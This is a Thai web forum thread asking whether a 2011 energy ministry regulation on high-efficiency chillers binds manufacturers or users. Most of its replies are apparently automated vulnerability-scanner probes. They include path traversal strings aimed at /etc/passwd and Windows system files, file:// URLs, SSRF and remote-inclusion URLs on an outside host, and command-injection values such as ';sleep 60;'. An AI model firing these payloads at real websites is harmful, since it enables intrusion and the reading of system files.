รายละเอียดเว็บบอร์ด

หัวข้อ -> ปรึกษากฎหมายเครื่องทำน้ำเย็นค่ะ
 
ประกาศกระทรวงพลังงาน เรื่อง กำหนดค่าประสิทธิภาพพลังงาน หน่วยงานทดสอบหาค่าประสิทธิภาพพลังงาน มาตรฐานและวิธีการทดสอบหาค่าประสิทธิภาพพลังงานของเครื่องทำน้ำเย็นสำหรับระบบปรับอากาศที่มีประสิทธิภาพสูง พ.ศ. 2554 อยากถามว่ากฎหมายนี้บังคับใช้กับโรงงานที่ผลิตหรือผู้ที่ใช้เครื่องทำความเย็นคะ
 
ผู้ตั้ง : อรุณศรี ดวงอาจ วันที่ : 30 มิ.ย. 54 14:33:14 น. ผู้ชม : 13,477
 

แสดงความคิดเห็น

ความคิดเห็น : กรอกความคิดเห็นค่ะ
ชื่อผู้ตั้ง : กรอกชื่อผู้ตั้งค่ะ
กรอกรหัสป้องกัน
 

ความคิดเห็น

ความคิดเห็นที่ 247
https://wapiti3.ovh/ssrf/16w6e4/303/746e6f7465/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:33:01 น.
 
ความคิดเห็นที่ 246
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:33:00 น.
 
ความคิดเห็นที่ 245
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/ssrf/16w6e4/303/746e616d65/ วันที่ : 09 ส.ค. 64 13:33:00 น.
 
ความคิดเห็นที่ 244
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:23:26 น.
 
ความคิดเห็นที่ 243
wkji1ljr3f
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:23:24 น.
 
ความคิดเห็นที่ 242
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:23:23 น.
 
ความคิดเห็นที่ 241
Hi there!
 
ผู้ตั้ง : วันที่ : 09 ส.ค. 64 13:23:23 น.
 
ความคิดเห็นที่ 240
Hi there!
 
ผู้ตั้ง : w5c0qjqfyc วันที่ : 09 ส.ค. 64 13:23:21 น.
 
ความคิดเห็นที่ 239
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:08:36 น.
 
ความคิดเห็นที่ 238
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:57:02 น.
 
ความคิดเห็นที่ 237
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:57:01 น.
 
ความคิดเห็นที่ 236
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:57:01 น.
 
ความคิดเห็นที่ 235
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:57:00 น.
 
ความคิดเห็นที่ 234
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:57:00 น.
 
ความคิดเห็นที่ 233
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:59 น.
 
ความคิดเห็นที่ 232
file://C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:59 น.
 
ความคิดเห็นที่ 231
file:///etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:59 น.
 
ความคิดเห็นที่ 230
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:58 น.
 
ความคิดเห็นที่ 229
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:58 น.
 
ความคิดเห็นที่ 228
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:58 น.
 
ความคิดเห็นที่ 227
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:57 น.
 
ความคิดเห็นที่ 226
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:56 น.
 
ความคิดเห็นที่ 225
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:56 น.
 
ความคิดเห็นที่ 224
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:55 น.
 
ความคิดเห็นที่ 223
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:55 น.
 
ความคิดเห็นที่ 222
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:55 น.
 
ความคิดเห็นที่ 221
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:55 น.
 
ความคิดเห็นที่ 220
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:54 น.
 
ความคิดเห็นที่ 219
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:54 น.
 
ความคิดเห็นที่ 218
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:54 น.
 
ความคิดเห็นที่ 217
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:53 น.
 
ความคิดเห็นที่ 216
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:53 น.
 
ความคิดเห็นที่ 215
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:53 น.
 
ความคิดเห็นที่ 214
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:52 น.
 
ความคิดเห็นที่ 213
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:52 น.
 
ความคิดเห็นที่ 212
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:51 น.
 
ความคิดเห็นที่ 211
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:51 น.
 
ความคิดเห็นที่ 210
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:51 น.
 
ความคิดเห็นที่ 209
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:50 น.
 
ความคิดเห็นที่ 208
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:50 น.
 
ความคิดเห็นที่ 207
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:50 น.
 
ความคิดเห็นที่ 206
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:49 น.
 
ความคิดเห็นที่ 205
../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:49 น.
 
ความคิดเห็นที่ 204
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:48 น.
 
ความคิดเห็นที่ 203
../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:48 น.
 
ความคิดเห็นที่ 202
../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:48 น.
 
ความคิดเห็นที่ 201
../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:47 น.
 
ความคิดเห็นที่ 200
../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:47 น.
 
ความคิดเห็นที่ 199
../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:47 น.
 
ความคิดเห็นที่ 198
../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:47 น.
 
ความคิดเห็นที่ 197
../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:46 น.
 
ความคิดเห็นที่ 196
../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:46 น.
 
ความคิดเห็นที่ 195
../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:46 น.
 
ความคิดเห็นที่ 194
../../../../../../../../../../windows/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:45 น.
 
ความคิดเห็นที่ 193
../../../../../../../../../../lib/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:45 น.
 
ความคิดเห็นที่ 192
C:/Windows/System32/drivers/etc/services::$DATA
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:44 น.
 
ความคิดเห็นที่ 191
C:/Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:44 น.
 
ความคิดเห็นที่ 190
C:/Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:43 น.
 
ความคิดเห็นที่ 189
C:WindowsSystem32driversetcservices::$DATA
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:43 น.
 
ความคิดเห็นที่ 188
C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:42 น.
 
ความคิดเห็นที่ 187
C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:41 น.
 
ความคิดเห็นที่ 186
/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:41 น.
 
ความคิดเห็นที่ 185
/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:41 น.
 
ความคิดเห็นที่ 184
/etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:40 น.
 
ความคิดเห็นที่ 183
/etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:40 น.
 
ความคิดเห็นที่ 182
https://wapiti3.ovh/e.php
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:39 น.
 
ความคิดเห็นที่ 181
https://wapiti3.ovh/e.php
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:39 น.
 
ความคิดเห็นที่ 180
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:39 น.
 
ความคิดเห็นที่ 179
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:38 น.
 
ความคิดเห็นที่ 178
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:38 น.
 
ความคิดเห็นที่ 177
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:38 น.
 
ความคิดเห็นที่ 176
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:38 น.
 
ความคิดเห็นที่ 175
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:37 น.
 
ความคิดเห็นที่ 174
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:37 น.
 
ความคิดเห็นที่ 173
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:36 น.
 
ความคิดเห็นที่ 172
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:36 น.
 
ความคิดเห็นที่ 171
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:36 น.
 
ความคิดเห็นที่ 170
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:35 น.
 
ความคิดเห็นที่ 169
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:35 น.
 
ความคิดเห็นที่ 168
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:34 น.
 
ความคิดเห็นที่ 167
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:33 น.
 
ความคิดเห็นที่ 166
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:33 น.
 
ความคิดเห็นที่ 165
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:33 น.
 
ความคิดเห็นที่ 164
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:33 น.
 
ความคิดเห็นที่ 163
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:32 น.
 
ความคิดเห็นที่ 162
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:32 น.
 
ความคิดเห็นที่ 161
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:32 น.
 
ความคิดเห็นที่ 160
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:31 น.
 
ความคิดเห็นที่ 159
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:31 น.
 
ความคิดเห็นที่ 158
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:30 น.
 
ความคิดเห็นที่ 157
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:30 น.
 
ความคิดเห็นที่ 156
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:30 น.
 
ความคิดเห็นที่ 155
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:29 น.
 
ความคิดเห็นที่ 154
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:29 น.
 
ความคิดเห็นที่ 153
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:28 น.
 
ความคิดเห็นที่ 152
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:28 น.
 
ความคิดเห็นที่ 151
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:27 น.
 
ความคิดเห็นที่ 150
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:27 น.
 
ความคิดเห็นที่ 149
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:27 น.
 
ความคิดเห็นที่ 148
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:27 น.
 
ความคิดเห็นที่ 147
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:26 น.
 
ความคิดเห็นที่ 146
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:26 น.
 
ความคิดเห็นที่ 145
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:25 น.
 
ความคิดเห็นที่ 144
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:25 น.
 
ความคิดเห็นที่ 143
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:24 น.
 
ความคิดเห็นที่ 142
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:24 น.
 
ความคิดเห็นที่ 141
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:23 น.
 
ความคิดเห็นที่ 140
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:23 น.
 
ความคิดเห็นที่ 139
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:23 น.
 
ความคิดเห็นที่ 138
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:22 น.
 
ความคิดเห็นที่ 137
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:22 น.
 
ความคิดเห็นที่ 136
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:22 น.
 
ความคิดเห็นที่ 135
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:21 น.
 
ความคิดเห็นที่ 134
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:21 น.
 
ความคิดเห็นที่ 133
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:20 น.
 
ความคิดเห็นที่ 132
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:20 น.
 
ความคิดเห็นที่ 131
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:20 น.
 
ความคิดเห็นที่ 130
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:19 น.
 
ความคิดเห็นที่ 129
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:19 น.
 
ความคิดเห็นที่ 128
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:19 น.
 
ความคิดเห็นที่ 127
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:18 น.
 
ความคิดเห็นที่ 126
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:18 น.
 
ความคิดเห็นที่ 125
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:17 น.
 
ความคิดเห็นที่ 124
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:16 น.
 
ความคิดเห็นที่ 123
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 10:56:16 น.
 
ความคิดเห็นที่ 122
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 10:56:15 น.
 
ความคิดเห็นที่ 121
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 10:56:15 น.
 
ความคิดเห็นที่ 120
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 10:56:15 น.
 
ความคิดเห็นที่ 119
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 10:56:14 น.
 
ความคิดเห็นที่ 118
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 10:56:14 น.
 
ความคิดเห็นที่ 117
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 10:56:13 น.
 
ความคิดเห็นที่ 116
Hi there!
 
ผู้ตั้ง : file://C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 10:56:13 น.
 
ความคิดเห็นที่ 115
Hi there!
 
ผู้ตั้ง : file:///etc/passwd วันที่ : 09 ส.ค. 64 10:56:13 น.
 
ความคิดเห็นที่ 114
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 10:56:12 น.
 
ความคิดเห็นที่ 113
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:12 น.
 
ความคิดเห็นที่ 112
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 10:56:12 น.
 
ความคิดเห็นที่ 111
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:11 น.
 
ความคิดเห็นที่ 110
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:11 น.
 
ความคิดเห็นที่ 109
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:11 น.
 
ความคิดเห็นที่ 108
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:11 น.
 
ความคิดเห็นที่ 107
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:10 น.
 
ความคิดเห็นที่ 106
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:10 น.
 
ความคิดเห็นที่ 105
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:10 น.
 
ความคิดเห็นที่ 104
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:09 น.
 
ความคิดเห็นที่ 103
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:09 น.
 
ความคิดเห็นที่ 102
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 10:56:08 น.
 
ความคิดเห็นที่ 101
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:08 น.
 
ความคิดเห็นที่ 100
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 10:56:08 น.
 
ความคิดเห็นที่ 99
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:08 น.
 
ความคิดเห็นที่ 98
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:07 น.
 
ความคิดเห็นที่ 97
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:07 น.
 
ความคิดเห็นที่ 96
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:07 น.
 
ความคิดเห็นที่ 95
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:07 น.
 
ความคิดเห็นที่ 94
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:06 น.
 
ความคิดเห็นที่ 93
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:06 น.
 
ความคิดเห็นที่ 92
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:06 น.
 
ความคิดเห็นที่ 91
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:05 น.
 
ความคิดเห็นที่ 90
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:05 น.
 
ความคิดเห็นที่ 89
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:05 น.
 
ความคิดเห็นที่ 88
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:04 น.
 
ความคิดเห็นที่ 87
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:04 น.
 
ความคิดเห็นที่ 86
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:04 น.
 
ความคิดเห็นที่ 85
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:04 น.
 
ความคิดเห็นที่ 84
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:03 น.
 
ความคิดเห็นที่ 83
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:56:03 น.
 
ความคิดเห็นที่ 82
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:03 น.
 
ความคิดเห็นที่ 81
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:02 น.
 
ความคิดเห็นที่ 80
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:02 น.
 
ความคิดเห็นที่ 79
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:56:02 น.
 
ความคิดเห็นที่ 78
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../windows/ วันที่ : 09 ส.ค. 64 10:56:02 น.
 
ความคิดเห็นที่ 77
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../lib/ วันที่ : 09 ส.ค. 64 10:56:01 น.
 
ความคิดเห็นที่ 76
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services::$DATA วันที่ : 09 ส.ค. 64 10:56:01 น.
 
ความคิดเห็นที่ 75
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:01 น.
 
ความคิดเห็นที่ 74
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:56:01 น.
 
ความคิดเห็นที่ 73
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices::$DATA วันที่ : 09 ส.ค. 64 10:56:00 น.
 
ความคิดเห็นที่ 72
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 10:56:00 น.
 
ความคิดเห็นที่ 71
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 10:56:00 น.
 
ความคิดเห็นที่ 70
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 10:55:59 น.
 
ความคิดเห็นที่ 69
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 10:55:59 น.
 
ความคิดเห็นที่ 68
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 10:55:59 น.
 
ความคิดเห็นที่ 67
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 10:55:58 น.
 
ความคิดเห็นที่ 66
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 10:55:58 น.
 
ความคิดเห็นที่ 65
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 10:55:58 น.
 
ความคิดเห็นที่ 64
&ping -n 25 127.0.0.1&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:29 น.
 
ความคิดเห็นที่ 63
a|sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:28 น.
 
ความคิดเห็นที่ 62
a;sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:28 น.
 
ความคิดเห็นที่ 61
a`sleep 60`
 
